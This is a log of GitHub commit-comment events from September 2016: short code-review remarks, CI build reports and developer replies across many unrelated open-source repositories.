{"id":"4585229872","type":"CommitCommentEvent","actor":{"login":"gibbtek"},"repo":{"name":"gantry/docs"},"payload":{"comment":{"id":19083420,"position":null,"line":null,"path":null,"commit_id":"6a7749fbbb94f25a73bd7898e67474404bc80d4f","created_at":"2016-09-19T18:59:28Z","updated_at":"2016-09-19T18:59:28Z","body":"Hi,\r\n\r\nI tried to adding 'gantry.theme.css('test')' as an asset but Gantry does not appear to parse this and a link tag is created in the head with the value untouched for the href. I also tried putting the path to the scss file, but again Gantry used the raw value as the href. It does not appear that Gantry is parsing this value like it would in a twig file when added via an asset.\r\n\r\nMy use case for this is that I'd like to be able to create a separate css file which is not actually loaded in to the site at all. The css file will be used to hold special classes (e.g. typography etc) to be used in the content editor. JCE (Joomla content editor) has an option to load styles from a css file and give users a nice drop down box inside the editor with only the special classes we create. Of course I could point it to custom.css but this file is obviously filled with many other styles.\r\n\r\nIt would be very nice if for example I could create a file inside /custom for example editor.scss and when Gantry runs the scss compiler it finds this file and compiles it to a css file with the same name in /css-compiled.\r\n\r\n"}},"created_at":"2016-09-19T18:59:28Z"}
{"id":"4585230520","type":"CommitCommentEvent","actor":{"login":"niftylettuce"},"repo":{"name":"koajs/csrf"},"payload":{"comment":{"id":19083423,"position":null,"line":null,"path":null,"commit_id":"9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe","created_at":"2016-09-19T18:59:34Z","updated_at":"2016-09-19T18:59:34Z","body":"No I meant like is there an automated way you prefer it to be updated. Like\nTJ's git-extra or something.  Or is it just updated manually haha?\n\nOn Sep 19, 2016 1:29 PM, \"jongleberry\" <notifications@github.com> wrote:\n\n> update the history.md? haha\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/koajs/csrf/commit/9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe#commitcomment-19082108>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAf7hXsgTPJNklUC1ut_hXgBXPFntGYnks5qrsZggaJpZM4KAVd1>\n> .\n>\n"}},"created_at":"2016-09-19T18:59:34Z"}
{"id":"4585238314","type":"CommitCommentEvent","actor":{"login":"DanGravel"},"repo":{"name":"DanGravel/TFTP"},"payload":{"comment":{"id":19083437,"position":null,"line":null,"path":null,"commit_id":"b6ae1b302d23a339e9bcdcbf57f20234a2b459c7","created_at":"2016-09-19T19:00:54Z","updated_at":"2016-09-19T19:00:54Z","body":"I dont think this appropriate "}},"created_at":"2016-09-19T19:00:54Z"}
{"id":"4585241678","type":"CommitCommentEvent","actor":{"login":"bengotow"},"repo":{"name":"mjs/imapclient"},"payload":{"comment":{"id":19083441,"position":14,"line":45,"path":"imapclient/test/test_folder_status.py","commit_id":"f994af6680d18442b54d8a7f4059f6c81d053413","created_at":"2016-09-19T19:01:30Z","updated_at":"2016-09-19T19:01:30Z","body":"Ahh awesome—sorry I didn't notice this file earlier! Will put future tests in the correct places 👍 "}},"created_at":"2016-09-19T19:01:30Z"}
{"id":"4585243655","type":"CommitCommentEvent","actor":{"login":"br0wncrust4cean"},"repo":{"name":"DanGravel/TFTP"},"payload":{"comment":{"id":19083445,"position":null,"line":null,"path":null,"commit_id":"b6ae1b302d23a339e9bcdcbf57f20234a2b459c7","created_at":"2016-09-19T19:01:51Z","updated_at":"2016-09-19T19:01:51Z","body":"ur mom isn't appropriate"}},"created_at":"2016-09-19T19:01:51Z"}
{"id":"4585244329","type":"CommitCommentEvent","actor":{"login":"pulkitsinghal"},"repo":{"name":"ShoppinPal/warehouse"},"payload":{"comment":{"id":19083454,"position":14,"line":21,"path":"package.json","commit_id":"e3e9a13d701677953fb2c985dc32d1c0beb969ff","created_at":"2016-09-19T19:01:58Z","updated_at":"2016-09-19T19:01:58Z","body":"@harshadyeola - this is really late but I'm wondering if there is way to prevent these from being moved here in addition to `optionalDependencies` section? Isn't there a way to leverage `npm install` when creating builds\r\n\r\nversus using `npm install --production` only when building the bits to be deployed?\r\n\r\ni guess this is a challenge because each warehouse docker instance is build on the spot at start ... will need to brainstorm with you and think of a way so that perhaps it doesn't have to be like that"}},"created_at":"2016-09-19T19:01:58Z"}
{"id":"4585245550","type":"CommitCommentEvent","actor":{"login":"DanGravel"},"repo":{"name":"DanGravel/TFTP"},"payload":{"comment":{"id":19083456,"position":null,"line":null,"path":null,"commit_id":"b6ae1b302d23a339e9bcdcbf57f20234a2b459c7","created_at":"2016-09-19T19:02:12Z","updated_at":"2016-09-19T19:02:12Z","body":"K."}},"created_at":"2016-09-19T19:02:12Z"}
{"id":"4585245861","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19083458,"position":null,"line":null,"path":null,"commit_id":"fb37f8ac964e384bef3cd41d97eaed47137ce0c4","created_at":"2016-09-19T19:02:15Z","updated_at":"2016-09-19T19:02:15Z","body":"That line is in English in the rom that is wrong with it, must be translated"}},"created_at":"2016-09-19T19:02:15Z"}
{"id":"4585247244","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19083462,"position":8,"line":67,"path":"src/Util/Notations.v","commit_id":"361a3a4b2d7b171fb0cd510beeb8e039088c2517","created_at":"2016-09-19T19:02:30Z","updated_at":"2016-09-19T19:02:30Z","body":"This is enough to break the build in 8.4:\r\n```coq\r\nReserved Notation \"'Let' x := y 'in' f\" (at level 200).\r\nLet x := 1.\r\n```\r\nI'm going to push a fix, feel free to change the notation to something else that doesn't conflict."}},"created_at":"2016-09-19T19:02:30Z"}
{"id":"4585248629","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083464,"position":30,"line":30,"path":"src/BenchmarkDotNet.Core/Helpers/SourceCodeHelper.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T19:02:45Z","updated_at":"2016-09-19T19:02:45Z","body":"No, we can't do it. This code will be used for properties of `Accuracy.Infra`. For example, you have implemented own Engine for measurements, you define it in the host process, but you want to use it in the generated program (it will also be implemented soon). We shouldn't care about performance here because by design this operation should be performed only once (for each property)."}},"created_at":"2016-09-19T19:02:45Z"}
{"id":"4585249241","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19083466,"position":null,"line":null,"path":null,"commit_id":"fb37f8ac964e384bef3cd41d97eaed47137ce0c4","created_at":"2016-09-19T19:02:52Z","updated_at":"2016-09-19T19:02:52Z","body":"https://cloud.githubusercontent.com/assets/2502938/18635983/6bc86582-7e87-11e6-9414-6d25dc2ee75f.png"}},"created_at":"2016-09-19T19:02:52Z"}
{"id":"4585252476","type":"CommitCommentEvent","actor":{"login":"segiddins"},"repo":{"name":"DanToml/whereis"},"payload":{"comment":{"id":19083475,"position":1,"line":1,"path":"app/person.rb","commit_id":"4b4582d1012e9e54a3926354ffae759d1602ff5e","created_at":"2016-09-19T19:03:29Z","updated_at":"2016-09-19T19:03:29Z","body":"`class`"}},"created_at":"2016-09-19T19:03:29Z"}
{"id":"4585256712","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19083487,"position":null,"line":null,"path":null,"commit_id":"fb37f8ac964e384bef3cd41d97eaed47137ce0c4","created_at":"2016-09-19T19:04:18Z","updated_at":"2016-09-19T19:04:18Z","body":"so? one time is enough \r\nhttps://github.com/ingbrzy/MA-XML-8.0-SPANISH/blob/fb37f8ac964e384bef3cd41d97eaed47137ce0c4/Spanish/main/Settings.apk/res/values-es/strings.xml#L3188"}},"created_at":"2016-09-19T19:04:18Z"}
{"id":"4585259840","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083492,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T19:04:41Z","updated_at":"2016-09-19T19:04:41Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-19T19:04:41Z"}
{"id":"4585264276","type":"CommitCommentEvent","actor":{"login":"raphiz"},"repo":{"name":"openhsr/connect"},"payload":{"comment":{"id":19083498,"position":null,"line":null,"path":null,"commit_id":"39264b02b7f801728ced96c45a22d9dcc6448b11","created_at":"2016-09-19T19:05:18Z","updated_at":"2016-09-19T19:05:18Z","body":"@Excape Sehr Cool!\r\nAber müssten wir nicht den Default noch als required in die config nehmen?"}},"created_at":"2016-09-19T19:05:18Z"}
{"id":"4585265696","type":"CommitCommentEvent","actor":{"login":"JunTaoLuo"},"repo":{"name":"aspnet/ResponseCaching"},"payload":{"comment":{"id":19083499,"position":null,"line":null,"path":null,"commit_id":"5964da363ed765ac24655b1dfa6ff7b584fd2e1c","created_at":"2016-09-19T19:05:33Z","updated_at":"2016-09-19T19:05:33Z","body":"I think there are many other places that needs something like this:\r\n\r\nhttps://github.com/aspnet/ResponseCaching/blob/dev/src/Microsoft.AspNetCore.ResponseCaching/ResponseCacheMiddleware.cs#L358\r\nmakes two calls to `IfUnmodifiedSince`\r\nhttps://github.com/aspnet/ResponseCaching/blob/dev/src/Microsoft.AspNetCore.ResponseCaching/ResponseCacheMiddleware.cs#L272-L273\r\nmakes two calls to `ContentLength`\r\n\r\nWe also need to cache the response date and response expires information on the ResponseCacheContext so both the middleware and the ResponseCachePolicyProvider can use it."}},"created_at":"2016-09-19T19:05:33Z"}
{"id":"4585266122","type":"CommitCommentEvent","actor":{"login":"edeyoung"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19083502,"position":null,"line":null,"path":null,"commit_id":"ff21c5e6b5edefab0741c0e4ee439012943adb72","created_at":"2016-09-19T19:05:38Z","updated_at":"2016-09-19T19:05:38Z","body":"I just pulled locally and I'm not seeing the link:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/11574199/18645227/67e88c56-7e7a-11e6-90bb-964a117e839a.png)\r\n\r\nI do show this commit in my log messages, so I'm up to date."}},"created_at":"2016-09-19T19:05:38Z"}
{"id":"4585266921","type":"CommitCommentEvent","actor":{"login":"martonbognar"},"repo":{"name":"kripod/bme-vik-info"},"payload":{"comment":{"id":19083504,"position":3,"line":3,"path":"bsc-01/prog/peldak/het-01/05-osszetett-vezerlesi-szerkezetek/szorzotabla-fejleccel/c/main.c","commit_id":"2c1f0cd2df04180d0e3b0565c527a42b65d46b88","created_at":"2016-09-19T19:05:47Z","updated_at":"2016-09-19T19:05:47Z","body":"minek ide static? (azt jelenti c-ben a static amit szerinted jelent?)"}},"created_at":"2016-09-19T19:05:47Z"}
{"id":"4585271478","type":"CommitCommentEvent","actor":{"login":"bornmand"},"repo":{"name":"KhaosT/HAP-NodeJS"},"payload":{"comment":{"id":19083515,"position":null,"line":null,"path":null,"commit_id":"7b42deba8f3e7b8057390b0155782cb33272df4d","created_at":"2016-09-19T19:06:37Z","updated_at":"2016-09-19T19:06:37Z","body":"Thank you for the reply. That seemed to correct the error."}},"created_at":"2016-09-19T19:06:37Z"}
{"id":"4585272611","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19083516,"position":null,"line":null,"path":null,"commit_id":"4d9c785e174414dc14ccc628abc2197d8e03d2ad","created_at":"2016-09-19T19:06:50Z","updated_at":"2016-09-19T19:06:50Z","body":"This review is doomed by upsource, let's close it soon.\nLatest changes: \n- add type aliases for collections in java.util to ease migration\n- remove testData import fixes, as now they resolve to type aliases in JS. I'll rework these imports later after introducing collection type aliases in JVM stdlib."}},"created_at":"2016-09-19T19:06:50Z"}
{"id":"4585272659","type":"CommitCommentEvent","actor":{"login":"norkdev"},"repo":{"name":"norkdev/athena"},"payload":{"comment":{"id":19083517,"position":null,"line":null,"path":null,"commit_id":"a8ec90ee16ed3a7b08e2ad0c3536f58a7acc7215","created_at":"2016-09-19T19:06:50Z","updated_at":"2016-09-19T19:06:50Z","body":"Read first!"}},"created_at":"2016-09-19T19:06:50Z"}
{"id":"4585273094","type":"CommitCommentEvent","actor":{"login":"gastonrobledo"},"repo":{"name":"arnesson/cordova-plugin-firebase"},"payload":{"comment":{"id":19083518,"position":10,"line":77,"path":"src/ios/AppDelegate+FirebasePlugin.m","commit_id":"1a220ef89960bb2a67dbfd001fe373c79243aff1","created_at":"2016-09-19T19:06:56Z","updated_at":"2016-09-19T19:06:56Z","body":"```application``` is missing there."}},"created_at":"2016-09-19T19:06:56Z"}
{"id":"4585273292","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19083519,"position":null,"line":null,"path":null,"commit_id":"fb37f8ac964e384bef3cd41d97eaed47137ce0c4","created_at":"2016-09-19T19:06:57Z","updated_at":"2016-09-19T19:06:57Z","body":"ok, I did not realize"}},"created_at":"2016-09-19T19:06:57Z"}
{"id":"4585274667","type":"CommitCommentEvent","actor":{"login":"gastonrobledo"},"repo":{"name":"arnesson/cordova-plugin-firebase"},"payload":{"comment":{"id":19083525,"position":10,"line":77,"path":"src/ios/AppDelegate+FirebasePlugin.m","commit_id":"1a220ef89960bb2a67dbfd001fe373c79243aff1","created_at":"2016-09-19T19:07:13Z","updated_at":"2016-09-19T19:07:13Z","body":"I think you forgot to add the proper import ```#if defined(__IPHONE_10_0) && __IPHONE_OS_VERSION_MAX_ALLOWED >= __IPHONE_10_0\r\n@import UserNotifications;\r\n#endif```"}},"created_at":"2016-09-19T19:07:13Z"}
{"id":"4585275779","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19083530,"position":58,"line":281,"path":"radio/src/targets/horus/diskio.cpp","commit_id":"d12015e91de5ea3eb409e01733d6c222efe8c268","created_at":"2016-09-19T19:07:25Z","updated_at":"2016-09-19T19:07:25Z","body":"The bug is mine I guess, thanks for your help on this, I didn't notice the bug"}},"created_at":"2016-09-19T19:07:25Z"}
{"id":"4585278413","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19083539,"position":116,"line":116,"path":"browser/js/products/products.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T19:07:55Z","updated_at":"2016-09-19T19:07:55Z","body":"In ES6 you can do:\r\n\r\n```js\r\nreturn {\r\n  getAll,\r\n  getOneTear,\r\n  // ...etc\r\n}\r\n```"}},"created_at":"2016-09-19T19:07:55Z"}
{"id":"4585278859","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083541,"position":5,"line":5,"path":"src/BenchmarkDotNet.Core/Jobs/PropertyT.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T19:08:00Z","updated_at":"2016-09-19T19:08:00Z","body":"The `Property<T>` is dead, long live the `ICharacteristic<T>`! Basically, `ICharacteristic<T>` is an improved version of `Property<T>`. I have changed the name to avoid confusion with properties from reflection."}},"created_at":"2016-09-19T19:08:00Z"}
{"id":"4585281605","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083547,"position":null,"line":null,"path":null,"commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T19:08:30Z","updated_at":"2016-09-19T19:08:30Z","body":"@adamsitnik, More awesome changes are coming. Thanks for the review."}},"created_at":"2016-09-19T19:08:30Z"}
{"id":"4585282317","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19083548,"position":66,"line":66,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T19:08:38Z","updated_at":"2016-09-19T19:08:38Z","body":"Also: error handling"}},"created_at":"2016-09-19T19:08:38Z"}
{"id":"4585283752","type":"CommitCommentEvent","actor":{"login":"asteroidsbg"},"repo":{"name":"asteroidsbg/Hello-World"},"payload":{"comment":{"id":19083554,"position":null,"line":null,"path":null,"commit_id":"903914a68946aa0f54029215993133ac869e297c","created_at":"2016-09-19T19:08:55Z","updated_at":"2016-09-19T19:08:55Z","body":"[webm.html.txt](https://github.com/asteroidsbg/Hello-World/files/480884/webm.html)\r\n"}},"created_at":"2016-09-19T19:08:55Z"}
{"id":"4585286238","type":"CommitCommentEvent","actor":{"login":"AntonNPE"},"repo":{"name":"AntonNPE/fantasyProject"},"payload":{"comment":{"id":19083561,"position":null,"line":null,"path":null,"commit_id":"b612783f94d33af6acb0e600913029f837952446","created_at":"2016-09-19T19:09:20Z","updated_at":"2016-09-19T19:09:20Z","body":"Just a little test\r\n"}},"created_at":"2016-09-19T19:09:20Z"}
{"id":"4585294648","type":"CommitCommentEvent","actor":{"login":"infojunkie"},"repo":{"name":"meedan/meedan-code"},"payload":{"comment":{"id":19083580,"position":5,"line":49,"path":"_data/people.yml","commit_id":"1474ca7f2ecda927287d2bc12e9909358b3ab6d4","created_at":"2016-09-19T19:10:52Z","updated_at":"2016-09-19T19:10:52Z","body":"Clarissa, you are already there in the file. Please remove this extra entry."}},"created_at":"2016-09-19T19:10:52Z"}
{"id":"4585297433","type":"CommitCommentEvent","actor":{"login":"Excape"},"repo":{"name":"openhsr/connect"},"payload":{"comment":{"id":19083589,"position":null,"line":null,"path":null,"commit_id":"39264b02b7f801728ced96c45a22d9dcc6448b11","created_at":"2016-09-19T19:11:23Z","updated_at":"2016-09-19T19:11:23Z","body":"@Raphi Nein, der default ist nicht required. Wenn er nicht definiert ist, muss allerdings jedes Repository einen  local path haben (sonst gibt es eine ConfigurationException). Das prüfe ich in[ Zeilen 155-159](https://github.com/openhsr/connect/blob/39264b02b7f801728ced96c45a22d9dcc6448b11/openhsr_connect/configuration.py#L156)"}},"created_at":"2016-09-19T19:11:23Z"}
{"id":"4585298800","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19083591,"position":8,"line":71,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Components.PropertyGrid/PropertyEditorCell.cs","commit_id":"5fc80a71de7c355edb14098bf60db585bf13fad1","created_at":"2016-09-19T19:11:38Z","updated_at":"2016-09-19T19:11:38Z","body":"Because I got used to not using C# 6 due to Gtk#. :P"}},"created_at":"2016-09-19T19:11:38Z"}
{"id":"4585300620","type":"CommitCommentEvent","actor":{"login":"mbostock"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19083595,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-19T19:11:57Z","updated_at":"2016-09-19T19:11:57Z","body":"I’ve updated the [API Reference](https://github.com/mbostock/topojson/wiki/API-Reference) on the wiki accordingly. It’s publicly-editable, so feel free to make improvements."}},"created_at":"2016-09-19T19:11:57Z"}
{"id":"4585303061","type":"CommitCommentEvent","actor":{"login":"raphiz"},"repo":{"name":"openhsr/connect"},"payload":{"comment":{"id":19083602,"position":null,"line":null,"path":null,"commit_id":"39264b02b7f801728ced96c45a22d9dcc6448b11","created_at":"2016-09-19T19:12:25Z","updated_at":"2016-09-19T19:12:25Z","body":"@Excape ich dummerchen - super! Danke :tada: "}},"created_at":"2016-09-19T19:12:25Z"}
{"id":"4585308098","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"mapbox/csv2geojson"},"payload":{"comment":{"id":19083619,"position":null,"line":null,"path":null,"commit_id":"5c36bd5e004bd49e3de354153d37aa7bc51d3011","created_at":"2016-09-19T19:13:18Z","updated_at":"2016-09-19T19:13:18Z","body":"Thanks :)"}},"created_at":"2016-09-19T19:13:18Z"}
{"id":"4585308864","type":"CommitCommentEvent","actor":{"login":"kunthar"},"repo":{"name":"zetaops/ulakbus"},"payload":{"comment":{"id":19083621,"position":null,"line":null,"path":null,"commit_id":"958052bdd2c712e26e18c5d9cc6f920bf26c2235","created_at":"2016-09-19T19:13:26Z","updated_at":"2016-09-19T19:13:26Z","body":"Yakin alakanıza teşekkür ediyoruz. Uzmanlarımız sırf bu konu üzerinde çalışmak üzere Kamboçya'da 6 ay eğitim almıştır."}},"created_at":"2016-09-19T19:13:26Z"}
{"id":"4585309385","type":"CommitCommentEvent","actor":{"login":"110EIm"},"repo":{"name":"MineJet/MineJet"},"payload":{"comment":{"id":19083626,"position":null,"line":null,"path":null,"commit_id":"6c6274840127e1ec08df19462865be93a8ad76f1","created_at":"2016-09-19T19:13:33Z","updated_at":"2016-09-19T19:13:33Z","body":"전보단 깔끔하지만 여전히 극혐 ㅠㅠ 코딩 좀 잘하고 싶어요"}},"created_at":"2016-09-19T19:13:33Z"}
{"id":"4585311559","type":"CommitCommentEvent","actor":{"login":"Cproyecto"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19083631,"position":null,"line":null,"path":null,"commit_id":"54a7fac1b65fdc0a281dd74145b960d3be1e9e8e","created_at":"2016-09-19T19:13:56Z","updated_at":"2016-09-19T19:13:56Z","body":"[Database diccionario.docx](https://github.com/Unifsena/Unifsena/files/480893/Database.diccionario.docx)\r\n"}},"created_at":"2016-09-19T19:13:56Z"}
{"id":"4585314907","type":"CommitCommentEvent","actor":{"login":"kripod"},"repo":{"name":"kripod/bme-vik-info"},"payload":{"comment":{"id":19083644,"position":3,"line":3,"path":"bsc-01/prog/peldak/het-01/05-osszetett-vezerlesi-szerkezetek/szorzotabla-fejleccel/c/main.c","commit_id":"2c1f0cd2df04180d0e3b0565c527a42b65d46b88","created_at":"2016-09-19T19:14:34Z","updated_at":"2016-09-19T19:14:34Z","body":"Nincs szükség arra, hogy más fájlból is hozzáférhessenek az adott konstansokhoz, ráadásul a compiler jobban tudja optimalizálni a statikusként deklarált konstansokat."}},"created_at":"2016-09-19T19:14:34Z"}
{"id":"4585320253","type":"CommitCommentEvent","actor":{"login":"markusrothhoeft"},"repo":{"name":"Angular2Buch/workshop-mse"},"payload":{"comment":{"id":19083652,"position":null,"line":null,"path":null,"commit_id":"ee1ea5e3e3a7cbdcc84e43dfb4549788ab3bc7d5","created_at":"2016-09-19T19:15:33Z","updated_at":"2016-09-19T19:15:33Z","body":"Vielen Dank fürs Update auf 2.0.0 final."}},"created_at":"2016-09-19T19:15:33Z"}
{"id":"4585321597","type":"CommitCommentEvent","actor":{"login":"sebix"},"repo":{"name":"rthalley/dnspython"},"payload":{"comment":{"id":19083654,"position":5,"line":18,"path":".travis.yml","commit_id":"58e84f91047966ad36562cd19bd89c38680f3d8c","created_at":"2016-09-19T19:15:46Z","updated_at":"2016-09-19T19:15:46Z","body":"Tests are not run without these optional modules. I can send a PR which adds additional builds, where these are not built. (See [Build Matrix](https://docs.travis-ci.com/user/customizing-the-build#build-matrix))"}},"created_at":"2016-09-19T19:15:46Z"}
{"id":"4585321992","type":"CommitCommentEvent","actor":{"login":"lizschwab"},"repo":{"name":"angular-ui/ui-grid"},"payload":{"comment":{"id":19083655,"position":null,"line":null,"path":null,"commit_id":"0c044cafa449d0ff21105e0dc142c66aaffcbcbe","created_at":"2016-09-19T19:15:50Z","updated_at":"2016-09-19T19:15:50Z","body":"This is still not hiding the button for me."}},"created_at":"2016-09-19T19:15:50Z"}
{"id":"4585325107","type":"CommitCommentEvent","actor":{"login":"andytuba"},"repo":{"name":"creesch/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":19083662,"position":4,"line":58,"path":"lib/modules/hosts/wikipedia.js","commit_id":"c8b6916c20d712e05003c28218de869ff551fed9","created_at":"2016-09-19T19:16:19Z","updated_at":"2016-09-19T19:16:19Z","body":"Maybe out of scope for your change, but it would be neat to add support in showImages for \"siteAttribution: 'above'\" media host property."}},"created_at":"2016-09-19T19:16:19Z"}
{"id":"4585326665","type":"CommitCommentEvent","actor":{"login":"andytuba"},"repo":{"name":"creesch/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":19083665,"position":12,"line":520,"path":"lib/css/modules/_showImages.scss","commit_id":"c8b6916c20d712e05003c28218de869ff551fed9","created_at":"2016-09-19T19:16:35Z","updated_at":"2016-09-19T19:16:35Z","body":"probably good"}},"created_at":"2016-09-19T19:16:35Z"}
{"id":"4585329308","type":"CommitCommentEvent","actor":{"login":"decriptor"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19083672,"position":8,"line":71,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Components.PropertyGrid/PropertyEditorCell.cs","commit_id":"5fc80a71de7c355edb14098bf60db585bf13fad1","created_at":"2016-09-19T19:17:04Z","updated_at":"2016-09-19T19:17:04Z","body":"ah, ok. Just wondering if there was a technical reason :)"}},"created_at":"2016-09-19T19:17:04Z"}
{"id":"4585331237","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19083677,"position":null,"line":null,"path":null,"commit_id":"a96eebb43d5efd87f872e12848ab3bb08f34eaee","created_at":"2016-09-19T19:17:26Z","updated_at":"2016-09-19T19:17:26Z","body":"Nevermind.. apparently this is a problem with Estuary too, so I'm going to assume it's a core issue."}},"created_at":"2016-09-19T19:17:26Z"}
{"id":"4585331484","type":"CommitCommentEvent","actor":{"login":"pixelhandler"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19083678,"position":69,"line":255,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T19:17:28Z","updated_at":"2016-09-19T19:17:28Z","body":"ah true"}},"created_at":"2016-09-19T19:17:28Z"}
{"id":"4585332662","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19083683,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T19:17:40Z","updated_at":"2016-09-19T19:17:40Z","body":"patch-1 (felixonmars) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-19T19:17:40Z"}
{"id":"4585332798","type":"CommitCommentEvent","actor":{"login":"virtuallynathan"},"repo":{"name":"Comcast/traffic_control"},"payload":{"comment":{"id":19083684,"position":null,"line":null,"path":null,"commit_id":"5e37d761733be7db613cc143fab4330e53839062","created_at":"2016-09-19T19:17:41Z","updated_at":"2016-09-19T19:17:41Z","body":"Just as an FYI, this isn't always convention -- the go/net stdlib package uses \"IPv6\" and \"IPv4\" as in the RFC capitalization: https://golang.org/src/net/ip.go?s=1189:1218#L33"}},"created_at":"2016-09-19T19:17:41Z"}
{"id":"4585334898","type":"CommitCommentEvent","actor":{"login":"pixelhandler"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19083686,"position":59,"line":245,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T19:18:06Z","updated_at":"2016-09-19T19:18:06Z","body":"@aars good point, thanks."}},"created_at":"2016-09-19T19:18:06Z"}
